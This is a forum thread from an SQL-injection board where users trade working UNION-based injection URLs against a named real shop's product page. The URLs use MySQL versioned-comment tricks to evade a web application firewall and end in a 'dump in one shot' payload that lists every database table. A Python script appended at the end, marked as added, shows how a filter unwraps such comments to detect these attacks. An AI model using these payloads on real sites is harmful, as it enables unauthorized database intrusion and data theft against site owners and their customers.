How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
FUNCTION dkprintw_db.0group_concat does not exist
Posted by: kenjii
Date: November 29, 2013 01:37PM

Hi all, I have a problem with this one:

http://www.dkprintworld.com/product-detail.php?pid=-1280857046 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,version(),46,47,/*!500000group_concat*/(table_name),49,50,51,52,53,54,55,56+from /*!50000information_schema*/.tables

I can get the first table_name, but when I try to concat I get this error:

FUNCTION dkprintw_db.0group_concat does not exist

Is there a way to get the other tables, or another syntax to use?

Re: FUNCTION dkprintw_db.0group_concat does not exist
Posted by: ajkaro
Date: November 29, 2013 02:51PM

The WAF is protecting the group_concat function.

Use:

hXXp://wXw.dkpr[slackers]intworld.com/product-detail.php?pid=-1280857046 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,/*!50000Group_Concat(table_name,0x3c62723e)*/,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,version(),49,50,51,52,53,54,55,56 from /*!50000information_schema*/.tables where table_schema=database()-- -

But you will hit the group_concat 1024-character limit (you won't see all tables in the database), so you will have to use the "dump in one shot" syntax (see below) to overcome that...

Here is a numbered list of all tables in the database:
hXXp://wXw.dkprint[slackers]world.com/product-detail.php?pid=-1280857046 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,
(/*!50000SeLeCt*/(@x) from (/*!50000SeLeCt*/(@x:=0x00), (@running_number:=0),(/*!50000SeLeCt*/(0) from ( /*!50000information_schema*/.tables ) where (table_schema=database()) and (0x00) in (@x:=concat (@x,0x3c62723e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x2e20,table_name))))x)
,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,version(),49,50,51,52,53,54,55,56-- -

Re: FUNCTION dkprintw_db.0group_concat does not exist
Posted by: hack2012
Date: December 02, 2013 08:16PM

http://www.dkprintworld.com/product-detail.php?pid=-1280857046 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,/*!12345concat*/(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,version(),46,47,48,49,50,51,52,53,54,55,56+from /*!50000information_schema*/.tables where table_schema=database()

Just use the "concat" function, then you will find that the text in red is the table name you want.



Edited 1 time(s). Last edit at 12/02/2013 08:19PM by hack2012.

Re: FUNCTION dkprintw_db.0group_concat does not exist
Posted by: ajkaro
Date: December 03, 2013 06:10PM

@hack2012

Your tip is wrong.

The concat() function is for concatenating a few arguments, like concat(version(), 'ajkaro').

As you are not concatenating anything to table_name (your code: concat(table_name)), the concat() function isn't doing anything in your case, so you can delete it.

You need the group_concat function if you want to see all tables at once and not only ONE table as in your case.

But as there are too many tables to fit in the group_concat 1024-character limit, you will have to use the "dump in one shot" syntax instead of group_concat if you want to see ALL tables at once on the screen.

Re: FUNCTION dkprintw_db.0group_concat does not exist
Posted by: firestorm
Date: December 09, 2013 11:55PM

Aj! My dear, you're wrong!! :P

Re: FUNCTION dkprintw_db.0group_concat does not exist
Posted by: ajkaro
Date: December 11, 2013 01:14PM

Dear firestorm,

do you mind elaborating? :)

Re: FUNCTION dkprintw_db.0group_concat does not exist
Posted by: firestorm
Date: December 11, 2013 05:29PM

Got ya!
hehehe... just kidding :P

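Added example, not part of the thread and not written by any of its posters: a detection-side sketch showing why a signature filter has to unwrap MySQL versioned comments such as /*!50000UnIoN*/ before matching, since the server executes their contents. The rule names, function names and sample parameter values are constructed for illustration, and the five-digit version prefix is an assumption matching MySQL 5.x.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of /*!NNNNN ... */ when its version is >= NNNNN,
# so a filter must match on the body, not on the raw comment text.
# Assumption: the version prefix is exactly five digits (MySQL 5.x style).
VERSIONED = re.compile(r"/\*!(?:\d{5})?(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Hypothetical rule set covering the constructs seen in this thread.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "user_variable_assignment": re.compile(r"@\w+\s*:="),
}

def normalize(raw):
    """Approximate the SQL text the MySQL parser sees for a raw parameter."""
    text = unquote_plus(raw)                      # '+' -> space, %2b -> '+'
    text = VERSIONED.sub(lambda m: " " + m.group(1) + " ", text)
    text = PLAIN_COMMENT.sub(" ", text)           # ordinary comments act as whitespace
    return re.sub(r"\s+", " ", text).strip().lower()

def naive_hits(raw):
    """Match rules against the raw value, as a filter without normalization would."""
    return sorted(n for n, rx in RULES.items() if rx.search(raw.lower()))

def detect(raw):
    """Match rules against the normalized value."""
    return sorted(n for n, rx in RULES.items() if rx.search(normalize(raw)))

# Constructed sample parameter values (shortened, placeholder column counts).
SAMPLES = [
    "1280857046",
    "-1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!50000Group_Concat(table_name)*/,3"
    "+from /*!50000information_schema*/.tables",
    "-1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,(@x:=0x00),3",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"naive={naive_hits(s)} normalized={detect(s)}")
```

Run on the six-digit /*!500000group_concat*/ from the first post, normalize() yields 0group_concat, the same name that appears in the error message in the thread title.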